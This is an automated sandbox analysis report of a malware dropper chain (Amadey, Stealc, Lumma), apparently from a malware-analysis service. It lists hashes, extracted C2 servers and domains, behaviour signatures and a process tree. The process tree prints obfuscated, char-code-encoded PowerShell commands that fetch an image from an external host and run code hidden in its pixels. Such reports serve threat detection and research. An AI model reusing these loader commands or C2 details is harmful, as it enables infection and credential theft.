Analysis

  • max time kernel
    142s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    03/12/2024, 00:13

General

  • Target

    file.exe

  • Size

    1.8MB

  • MD5

    1757e6ef55b0848a7ea67c1d14a8ab4a

  • SHA1

    f289f75005403bb17dff08acad0b56fdc88acc69

  • SHA256

    912b1bd940b6b3bace99c7b4cd750721df1333c0850ce989beb8c13f5dfb3f07

  • SHA512

    49948fade30ad1e6c492560fc241770ce58e6114c3f73ecc638f7337088f536c5aa538483dfbcddd5c9e42f3267000d9d2398b06023bb8187790634257de749e

  • SSDEEP

    24576:QGzutHHCxaEBVNJjV8vasWOBMh2GX7xFO9tX3eTgSZyaKTuC0YU6rhO:Q880VN38vIOBM8GX7y9teTe02

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

default_valenciga

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

lumma

C2

https://crib-endanger.sbs

https://faintbl0w.sbs

https://300snails.sbs

https://bored-light.sbs

https://3xc1aimbl0w.sbs

https://pull-trucker.sbs

https://fleez-inc.sbs

https://thicktoys.sbs

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 17 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 35 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1236
      • C:\Users\Admin\AppData\Local\Temp\file.exe
        "C:\Users\Admin\AppData\Local\Temp\file.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1508
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2712
          • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:2268
          • C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
            "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1928
          • C:\Users\Admin\AppData\Local\Temp\1002824001\e97a42b097.exe
            "C:\Users\Admin\AppData\Local\Temp\1002824001\e97a42b097.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            PID:2140
          • C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
            "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:624
            • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
              "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:300
          • C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
            "C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2500
          • C:\Users\Admin\AppData\Local\Temp\1004628001\ATLEQQXO.exe
            "C:\Users\Admin\AppData\Local\Temp\1004628001\ATLEQQXO.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2604
            • C:\Users\Admin\AppData\Local\Temp\pyexec.exe
              "C:\Users\Admin\AppData\Local\Temp\pyexec.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2840
              • C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe
                C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:1692
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\SysWOW64\cmd.exe
                  7⤵
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  PID:692
                  • C:\Users\Admin\AppData\Local\Temp\uzfvalidate.exe
                    C:\Users\Admin\AppData\Local\Temp\uzfvalidate.exe
                    8⤵
                    • Loads dropped DLL
                    PID:2292
          • C:\Users\Admin\AppData\Local\Temp\1004850001\roblox1.exe
            "C:\Users\Admin\AppData\Local\Temp\1004850001\roblox1.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2560
            • C:\Users\Admin\AppData\Local\Temp\onefile_2560_133776584261750000\stub.exe
              C:\Users\Admin\AppData\Local\Temp\1004850001\roblox1.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:3048
          • C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
            "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:2052
            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
              "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1876
              • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                6⤵
                  PID:2832
                • C:\Users\Admin\10009130102\Properties.exe
                  "C:\Users\Admin\10009130102\Properties.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:872
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" cmd /c powershell -NoProfile -NonInteractive -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,91,83,99,114,105,112,116,66,108,111,99,107,93,58,58,67,114,101,97,116,101,40,36,112,108,41,13,10,105,99,109,32,36,115,98,13,10,13,10,35,82,82,82,82)))); } c #d "
                    7⤵
                    • An obfuscated cmd.exe command-line is typically used to evade detection.
                    PID:1868
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -NoProfile -NonInteractive -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,91,83,99,114,105,112,116,66,108,111,99,107,93,58,58,67,114,101,97,116,101,40,36,112,108,41,13,10,105,99,109,32,36,115,98,13,10,13,10,35,82,82,82,82)))); } c #d
                      8⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1736
                  • C:\Windows\system32\cmd.exe
                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\deleteSelf.bat" "
                    7⤵
                      PID:1532
                  • C:\Users\Admin\10009150102\7749.exe
                    "C:\Users\Admin\10009150102\7749.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:3056
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd /c powershell -NoProfile -NonInteractive -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(83,101,116,45,80,83,82,101,97,100,76,105,110,101,79,112,116,105,111,110,32,45,72,105,115,116,111,114,121,83,97,118,101,83,116,121,108,101,32,83,97,118,101,78,111,116,104,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,99,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,71,71,86,57,54,48,52,76,103,46,66,109,112,34,13,10,36,109,101,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,99,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,101,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,13,10,36,109,101,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,101,109,115,41,13,10,13,10,36,101,110,99,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,13,10,13,10,36,98,105,116,100,32,61,32,36,105,109,103,49,46,76,111,99,107,66,105,116,115,40,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,82,101,99,116,97,110,103,108,101,93,58,58,70,114,111,109,76,84,82,66,40,48,44,32,48,44,32,36,105,109,103,49,46,87,105,100,116,104,44,32,36,105,109,103,49,46,72,101,105,103,104,116,41,44,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,105,110,103,46,73,109,97,103,101,76,111,99,107,77,111,100,101,93,58,58,82,101,97,100,79,110,108,121,44,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,105,110,103,46,80,105,120,101,108,70,111,114,109,97,116,93,58,58,70,111,114,109,97,116,51,50,98,112,112,65,114,103,98,41,13,10,36,115,99,48,49,32,61,32,36,98,105,116,100,46,83,99,97,110,48,13,10,36,115,116,114,105,49,32,61,32,36,98,105,116,100,46,83,116,114,105,100,101,13,10,13,10,13,10,102,111,114,32,40,36,121,32,61,32,48,59,32,36,121,32,45,108,116,32,36,105,109,103,49,46,72,101,105,103,104,116,59,32,36,121,43,43,41,32,123,13,10,32,32,32,32,102,111,114,32,40,36,120,32,61,32,48,59,32,36,120,32,45,108,116,32,36,105,109,103,49,46,87,105,100,116,104,59,32,36,120,43,43,41,32,123,13,10,32,32,32,32,32,32,32,32,36,112,105,120,101,108,79,102,102,115,101,116,32,61,32,36,121,32,42,32,36,115,116,114,105,49,32,43,32,36,120,32,42,32,52,13,10,32,32,32,32,32,32,32,32,36,98,121,116,101,32,61,32,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,82,101,97,100,66,121,116,101,40,36,115,99,48,49,44,32,36,112,105,120,101,108,79,102,102,115,101,116,41,13,10,32,32,32,32,32,32,32,32,36,101,110,99,46,65,100,100,40,36,98,121,116,101,41,13,10,32,32,32,32,125,13,10,125,13,10,13,10,13,10,36,105,109,103,49,46,85,110,108,111,99,107,66,105,116,115,40,36,98,105,116,100,41,13,10,13,10,36,97,115,115,101,109,98,108,121,32,61,32,91,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,40,36,101,110,99,46,84,111,65,114,114,97,121,40,41,41,13,10,36,97,115,115,101,109,98,108,121,46,69,110,116,114,121,80,111,105,110,116,46,73,110,118,111,107,101,40,36,110,117,108,108,44,32,64,40,41,41,13,10,13,10)))); } c #c "
                      7⤵
                      • An obfuscated cmd.exe command-line is typically used to evade detection.
                      PID:1064
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -NoProfile -NonInteractive -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(83,101,116,45,80,83,82,101,97,100,76,105,110,101,79,112,116,105,111,110,32,45,72,105,115,116,111,114,121,83,97,118,101,83,116,121,108,101,32,83,97,118,101,78,111,116,104,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,99,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,71,71,86,57,54,48,52,76,103,46,66,109,112,34,13,10,36,109,101,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,99,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,101,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,13,10,36,109,101,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,101,109,115,41,13,10,13,10,36,101,110,99,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,13,10,13,10,36,98,105,116,100,32,61,32,36,105,109,103,49,46,76,111,99,107,66,105,116,115,40,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,82,101,99,116,97,110,103,108,101,93,58,58,70,114,111,109,76,84,82,66,40,48,44,32,48,44,32,36,105,109,103,49,46,87,105,100,116,104,44,32,36,105,109,103,49,46,72,101,105,103,104,116,41,44,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,105,110,103,46,73,109,97,103,101,76,111,99,107,77,111,100,101,93,58,58,82,101,97,100,79,110,108,121,44,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,105,110,103,46,80,105,120,101,108,70,111,114,109,97,116,93,58,58,70,111,114,109,97,116,51,50,98,112,112,65,114,103,98,41,13,10,36,115,99,48,49,32,61,32,36,98,105,116,100,46,83,99,97,110,48,13,10,36,115,116,114,105,49,32,61,32,36,98,105,116,100,46,83,116,114,105,100,101,13,10,13,10,13,10,102,111,114,32,40,36,121,32,61,32,48,59,32,36,121,32,45,108,116,32,36,105,109,103,49,46,72,101,105,103,104,116,59,32,36,121,43,43,41,32,123,13,10,32,32,32,32,102,111,114,32,40,36,120,32,61,32,48,59,32,36,120,32,45,108,116,32,36,105,109,103,49,46,87,105,100,116,104,59,32,36,120,43,43,41,32,123,13,10,32,32,32,32,32,32,32,32,36,112,105,120,101,108,79,102,102,115,101,116,32,61,32,36,121,32,42,32,36,115,116,114,105,49,32,43,32,36,120,32,42,32,52,13,10,32,32,32,32,32,32,32,32,36,98,121,116,101,32,61,32,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,82,101,97,100,66,121,116,101,40,36,115,99,48,49,44,32,36,112,105,120,101,108,79,102,102,115,101,116,41,13,10,32,32,32,32,32,32,32,32,36,101,110,99,46,65,100,100,40,36,98,121,116,101,41,13,10,32,32,32,32,125,13,10,125,13,10,13,10,13,10,36,105,109,103,49,46,85,110,108,111,99,107,66,105,116,115,40,36,98,105,116,100,41,13,10,13,10,36,97,115,115,101,109,98,108,121,32,61,32,91,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,40,36,101,110,99,46,84,111,65,114,114,97,121,40,41,41,13,10,36,97,115,115,101,109,98,108,121,46,69,110,116,114,121,80,111,105,110,116,46,73,110,118,111,107,101,40,36,110,117,108,108,44,32,64,40,41,41,13,10,13,10)))); } c #c
                        8⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2024
                    • C:\Windows\system32\cmd.exe
                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\deleteSelf.bat" "
                      7⤵
                        PID:2864
                    • C:\Windows\SysWOW64\rundll32.exe
                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                      6⤵
                      • Blocklisted process makes network request
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:2484
                • C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe
                  "C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe"
                  4⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2792
            • C:\Windows\SysWOW64\dialer.exe
              "C:\Windows\system32\dialer.exe"
              2⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2296

          Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\10009130102\Properties.exe

                  Filesize

                  9KB

                  MD5

                  78962843f4337ae239e4ea040e282ebe

                  SHA1

                  3eb745467ac5b0dcc33e7aa5c8fe7cdfb28f9a94

                  SHA256

                  344614a3359f01148a54ca80e497b339f882f03811e97f04804680e21befdd84

                  SHA512

                  a4e2e9edf1053ed43af58a0591b1d6885e37f08c68770c7826dab08d2633eb7bd32628f1b15f62894e9fd3e339f2a4833aef5515f90a4b2318a3f556d93d059c

                • C:\Users\Admin\10009150102\7749.exe

                  Filesize

                  13KB

                  MD5

                  d4f004edd16ee6efd52c0b869464b361

                  SHA1

                  f2957f64d64c5fbeb1164d6f405a56798e83cd01

                  SHA256

                  acefc1ea003f806d5a54f0277eb4bcbf7eb0d82635eb3b48d6a3c285a9acce3f

                  SHA512

                  0905ccb5fdf41dd268ce5adc3197cf63e0194f6f68a65c7ebf2e698cbdafc2e068a4984a71cb0f17a78d9d1259a6a7813df95124b9cd204da7da3b878f22ac32

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                  Filesize

                  342B

                  MD5

                  03f72b0322c54a70bbec9dfca4a3c2d7

                  SHA1

                  274b29897fdb510fa27c9dcd45160da0160215c9

                  SHA256

                  70b34fae10f61dae3bcf138ae49628476e463b5ad11e80d82b112dbb7d0b3074

                  SHA512

                  eb28d93b2aaecfcb1e33b56ab51878ab7a00afbba2570143e6e0b1bf24f6defa9a1f6ba69248ee69aa8d4ad87f8c7cde63c1f43e301533f9e5e9180d9b3ef87f

                • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe

                  Filesize

                  307KB

                  MD5

                  68a99cf42959dc6406af26e91d39f523

                  SHA1

                  f11db933a83400136dc992820f485e0b73f1b933

                  SHA256

                  c200ddb7b54f8fa4e3acb6671f5fa0a13d54bd41b978d13e336f0497f46244f3

                  SHA512

                  7342073378d188912b3e7c6be498055ddf48f04c8def8e87c630c69294bcfd0802280babe8f86b88eaed40e983bcf054e527f457bb941c584b6ea54ad0f0aa75

                • C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe

                  Filesize

                  1.1MB

                  MD5

                  0984009f07548d30f9df551472e5c399

                  SHA1

                  a1339aa7c290a7e6021450d53e589bafa702f08a

                  SHA256

                  80ec0ec77fb6e4bbb4f01a2d3b8d867ddd0dfe7abdb993ef1401f004c18377be

                  SHA512

                  23a6a8d0d5c393adc33af6b5c90a4dd0539015757e2dbbd995fd5990aff516e0e2d379b7903e07399c476a7ec9388ed5253252276df6053063d2ed08f1a351e9

                • C:\Users\Admin\AppData\Local\Temp\1002824001\e97a42b097.exe

                  Filesize

                  2.8MB

                  MD5

                  6a3268db51b26c41418351e516bc33a6

                  SHA1

                  57a12903fff8cd7ea5aa3a2d2308c910ac455428

                  SHA256

                  eaebfc5e60378bbc47a603ca1310440c290a396cb2446de36ff6e7afb624ee0c

                  SHA512

                  43f257dbb7e444355e29a8023e8c8838c9e0ca7538a86c25ac41db1e0308bf73c3adda1b0fe5d0bcf536387b9ce5f8fed216f5f7d92c80bcc12e7bffde979b33

                • C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe

                  Filesize

